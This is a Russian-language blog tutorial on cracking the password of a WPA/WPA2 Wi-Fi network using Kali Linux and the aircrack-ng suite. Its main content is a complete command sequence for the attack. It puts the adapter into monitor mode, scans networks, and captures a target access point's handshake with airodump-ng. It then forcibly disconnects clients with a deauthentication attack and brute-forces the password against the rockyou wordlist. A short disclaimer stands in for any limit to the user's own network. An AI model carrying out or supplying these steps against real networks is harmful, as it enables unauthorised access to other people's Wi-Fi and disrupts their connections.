МВД России создаст департамент по борьбе с преступлениями в IT-сфере
МВД России создаст департамент по борьбе с преступлениями в IT-сфере
Ноябрь 4, 2019
тор браузер
Tor Browser v9.0 — все, что вам нужно для безопасного просмотра Интернета
Ноябрь 12, 2019

В наше время беспроводные сети Wi-Fi широко распространены. Многие пользователи думают о безопасности своих сетей и компьютеров, иногда у них возникают вопросы, например, как взломать Wi-Fi, реальна ли угроза для их сетей Wi-Fi?

В этой статье я предлагаю обычным пользователям, возможно, далеким от вопросов аудита безопасности беспроводных сетей, взглянуть на свою сеть Wi-Fi глазами хакера и даже поинтересоваться, как взломать Wi-Fi?

Хотя следующая статья написана на простейшем языке, мы не можем обойтись без некоторых основных терминов и понятий, характерных для аудита Wi-Fi.

Вся информация данная в этой статье, предназначена исключительно для удовлетворения любопытства уважаемых посетителей сайта и не призывает к действиям, авторы и владельцы сайта не несут ответственности за возможные последствия использования материалов сайта.

Условия Wi-Fi сетей

Access Point , сокращенно AP , устройство, обеспечивающее работу сети Wi-Fi, к нему подключаются клиенты. Чаще всего точками доступа являются беспроводные маршрутизаторы.

Client (Station) — это устройство, которое подключается к точке доступа. Чаще всего это компьютеры, ноутбуки, мобильные телефоны и т. Д.

ESSID и SSID — это имена беспроводных сетей Wi-Fi — вы можете видеть их, когда выбираете, к какой сети подключаться. Строго говоря, ESSID и SSID не совпадают, но при проверке Wi-Fi эти термины часто используются взаимозаменяемо. На снимке экрана ниже ESSID (имена сетей) — это MiAl, wifi88 и т. Д.:

wifi

BSSID — это MAC-адрес беспроводного адаптера. Пример MAC-адреса: 50: 46: 5D: 6E: 8C: 20

Handshake (Рукопожатие) — это обмен данными между станцией и точкой доступа, когда установлено соединение Wi-Fi. Эти данные содержат информацию, позволяющую взломать пароль из сети Wi-Fi.

Brute-Force — это метод атаки на пароль, когда выполняется поиск всех возможных вариантов пароля (пробуется каждый возможный вариант пароля). Это занимает много времени и вычислительных ресурсов.

Атака по словарю — это метод атаки на пароль, который включает поиск часто встречающихся вариантов пароля. Имеет хорошее соотношение затраченных ресурсов к результатам.

Сетевая атака на пароль Wi-Fi — это метод взлома пароля, который заключается в подключении к точке доступа с разными кандидатами в пароли. Практически не применяется из-за крайне низкой скорости.

Оффлайн атака на пароль Wi-Fi — это метод взлома пароля, который заключается в захвате рукопожатия и попытке выбора пароля, соответствуют ли они этому рукопожатию. Эта атака не требует подключения к точке доступа и выполняется на много порядков быстрее, чем атака онлайн. Это также может быть выполнено на графическом процессоре, что увеличивает скорость поиска на несколько порядков.

WPA и WPA2 — это два протокола безопасности для защиты беспроводных компьютерных сетей, заменившие устаревшую технологию WEP.

Беспроводной адаптер Wi-Fi — любой сетевой адаптер, который может подключаться к сети Wi-Fi. В ноутбуках и мобильных телефонах они встроены в корпус, в настольных компьютерах они обычно представляют собой внешнее устройство, подключенное через USB.

Режим мониторинга — это способность некоторых беспроводных адаптеров перехватывать кадры данных, которые предназначены не только для них, но и для других беспроводных устройств.

Сетевой интерфейс — это название, символическое обозначение сетевого ключа / адаптеров в Linux.

Канал сети Wi-Fi является символическим цифровым обозначением частоты, на которой в данный момент работает точка доступа.

Что нужно для взлома Wi-Fi

  • Компьютер умеет работать под Linux
  • Специализированное программное обеспечение, для Linux оно бесплатное (распространяется бесплатно и с открытым исходным кодом)
  • Беспроводной адаптер Wi-Fi, поддерживающий режим монитора. Список актуальных ключей.
  • Некоторые знания, которые вы найдете в этой статье.

Ключи Wi-Fi с поддержкой режима монитора продаются без каких-либо ограничений, их цена соответствует ценам других беспроводных адаптеров с аналогичными характеристиками. В моем ноутбуке встроенная карта поддерживает режим монитора — то есть это не редкость, и их может получить любой.

Как уже упоминалось, специализированное программное обеспечение для аудита Wi-Fi распространяется бесплатно, по умолчанию оно присутствует в специализированных дистрибутивах Linux, например, в Kali Linux.

Как видите, все необходимые для взлома компоненты Wi-Fi очень доступны по цене.

Все дальнейшие действия выполняются в Kali Linux.

Установите адаптер Wi-Fi в режим мониторинга

По умолчанию беспроводные адаптеры находятся в режиме «приемника». Этот режим позволяет вам подключаться к точке доступа как к обычной станции.

Режим монитора предназначен для анализа сети Wi-Fi. В этом режиме беспроводной адаптер принимает кадры из любых источников, работающих на том же канале.

Поскольку нам нужно захватить рукопожатие, состоящее из данных, которые станция отправляет на точку доступа, а точка доступа отправляет на станцию ​​(которые не для нас на любом этапе), то нам нужно установить наш ключ Wi-Fi на режим монитора. Это позволило бы нам увидеть эти данные и сохранить их для дальнейшей обработки.

Чтобы составить команды для установки адаптера Wi-Fi в режим мониторинга, нам нужно знать имя беспроводного интерфейса. Чтобы узнать это, откройте консоль и введите команду:

iw dev

хакинг

Имя беспроводного интерфейса указывается в строке со словом «Interface» , т.е. в моем случае это имя wlan0 . Запомните это значение, потому что в будущем оно нам нужно.

Режим «Монитор» не является чем-то обычным для операционной системы, поэтому некоторые программы без вывода сообщений устанавливают адаптер Wi-Fi в управляемый режим. Это может помешать нам, поэтому с помощью следующих двух команд мы закрываем программы, которые могут помешать нам:

sudo systemctl stop NetworkManager
sudo airmon-ng check kill

Теперь, наконец, мы можем установить беспроводную карту в режиме монитора. Для этого выполните последовательность команд:

sudo ip link set <INTERFACE> down
sudo iw <INTERFACE> set monitor control
sudo ip link set <INTERFACE> up

заменив <INTERFACE> на фактическое имя вашего беспроводного интерфейса (у меня wlan0 ):

sudo ip link set wlan0 down
sudo iw wlan0 set monitor control
sudo ip link set wlan0 up

Кажется, ничего не произошло, но набрав команду:

sudo iw dev

Как взломать Wi-Fi 3

На приведенном выше снимке экрана строка типа монитора показывает, что наша беспроводная карта находится в режиме монитора.

Что такое рукопожатие

Как уже упоминалось, рукопожатие — это данные, которые передаются в несколько этапов между станцией и точкой доступа в момент подключения станции к точке доступа. Это означает, что для захвата рукопожатия нам нужно переключиться на канал, на котором работает точка доступа, прослушивать радиосигналы и ждать, пока станция подключится к ней. Поскольку ожидание может занять некоторое время, используется прием, называемый «Аутентификация атаки», который заключается в принудительном сбросе соединения Wi-Fi между точкой доступа и станцией. Сразу после этого остановка станция пытается восстановить соединение, и в этот момент мы получаем рукопожатие.

К сожалению, этот метод не работает, если никто не подключен к точке доступа.

Обзор сетей Wi-Fi

Чтобы атаковать сеть Wi-Fi, нам нужно знать некоторые ее характеристики. Чтобы получить список всех сетей Wi-Fi, доступных в диапазоне, выполните команду:

airodump-ng wlan0

Обратите внимание, что если у вас другое имя для беспроводного интерфейса, то вместо wlan0 вам нужно ввести именно его.

Описанная атака применима только для сетей с защитой WPA2 или WPA, они составляют подавляющее большинство.

Аналогичный список сетей будет отображаться:

взлом wifi

Когда вы увидите в списке сеть, которую хотите атаковать, остановите программу, для этого нажмите CTRL + c .

Предположим, меня интересует сеть с dlink ESSID (имя) . Как показано на скриншоте, его характеристики: BSSID — 00: 1E: 58: C6: AC: FB, он использует WPA2, работает на шестом канале. Кроме того, ненулевое значение #Data (захваченные данные, отправленные этим AP) позволяет нам предполагать, что одна или более станций подключены к нему.

Чтобы захватить рукопожатие, используйте следующую команду:

sudo airodump-ng -c CHANNEL --bssid MAC_ADDRESS -w FILE INTERFACE

Где:

  • CHANNEL — это канал, на котором работает точка доступа.
  • MAC_ADDRESS является BSSID целевой AP
  • FILE — имя файла, в котором будет храниться рукопожатие
  • INTERFACE — название беспроводного интерфейса в режиме монитора

В моем случае команда выглядит так:

sudo airodump-ng -c 6 --bssid 00:1E:58:C6:AC:FB -w capture wlan0

На следующем снимке экрана показана точка доступа, на которую мы нацеливаемся, и теперь вы можете увидеть раздел со станциями:

Как взломать Wi-Fi 4

Для станции мы можем видеть в поле BSSID значение, которое соответствует BSSID точки доступа, то есть 00: 1E: 58: C6: AC: FB, это означает, что эта станция в настоящее время подключена к целевой AP. Теперь есть два варианта:

1) дождаться, пока Станция отключится и подключиться к точке доступа по естественным причинам

2) выполнить атаку деавторизации, чтобы ускорить процесс

Выполнение атаки на деавторизацию

Чтобы выполнить деавторизацию, не останавливая запись трафика, начатую на предыдущем шаге, откройте новое окно консоли и введите следующую команду:

sudo aireplay-ng -0 3 -a MAC_ADDRESS INTERFACE

Где:

  • MAC_ADDRESS является BSSID целевой AP
  • INTERFACE — название беспроводного интерфейса в режиме монитора

В моем случае команда выглядит так:

sudo aireplay-ng -0 3 -a 00:1E:58:C6:AC:FB  wlan0

Программа отображает следующее:

08:17:30  Waiting for beacon frame (BSSID: 00:1E:58:C6:AC:FB) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
08:17:30  Sending DeAuth to broadcast -- BSSID: [00:1E:58:C6:AC:FB]
08:17:30  Sending DeAuth to broadcast -- BSSID: [00:1E:58:C6:AC:FB]
08:17:31  Sending DeAuth to broadcast -- BSSID: [00:1E:58:C6:AC:FB]

А в правом верхнем углу экрана, где мы собираем данные, появится новая запись:

WPA handshake: 00:1E:58:C6:AC:FB

Это означает, что рукопожатие было успешно захвачено.

рукопажатия, взолм ви фи

Атака по словарю на точку Wi-Fi

Теперь нам нужно взломать пароль.

Подготовьте словарь:

cp /usr/share/wordlists/rockyou.txt.gz .
gunzip rockyou.txt.gz
cat rockyou.txt | sort | uniq | pw-inspector -m 8 -M 63 > newrockyou.txt

Файл словаря в этом случае называется newrockyou.txt.

Чтобы узнать имя захваченного рукопожатия, выполните команду:

ls -l capture*

Будет отображаться что-то вроде следующего (может быть больше записей, если вы неоднократно захватывали рукопожатия):

-rw-r--r-- 1 root root 73164 сен 30 08:24 capture-01.cap
-rw-r--r-- 1 root root   478 сен 30 08:24 capture-01.csv
-rw-r--r-- 1 root root   583 сен 30 08:24 capture-01.kismet.csv
-rw-r--r-- 1 root root  2766 сен 30 08:24 capture-01.kismet.netxml

Как взломать Wi-Fi 5

Нас интересует только файл capture-01.cap — он содержит рукопожатие.

Чтобы запустить атаку по словарю для взлома пароля Wi-Fi, используйте следующую команду:

aircrack-ng -w DICTIONARY_FILE HANDSHAKE_FILE

Итак, в моем случае точная команда:

aircrack-ng -w newrockyou.txt capture-01.cap

Эта команда запускает взлом пароля, в процессе перечисления отображается следующее окно:

брут форс

Пароль взломан:

пароль взломан

На это указывает запись KEY FOUND! Pattayateam, в котором пароль от сети Wi-Fi является pattayateam. Используя этот пароль, вы можете подключиться к беспроводной точке доступа с любого устройства (компьютера, телефона), как это делают другие законные пользователи.

Заключение

Как видите, взлом Wi-Fi не является чем-то чрезвычайно сложным, хотя требует знания некоторых команд Linux. Вот лишь один из множества вариантов атаки на Wi-Fi.

 

0

Автор публикации

не в сети 1 месяц

Александр Никитюк

16
Комментарии: 13Публикации: 161Регистрация: 17-05-2019
ПОДЕЛИСЬ С ДРУЗЬЯМИ

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *

двадцать − 15 =

Авторизация
*
*

9 + 10 =

Регистрация
*
*
*
Пароль не введен
*

3 × 4 =

Генерация пароля

четыре + 19 =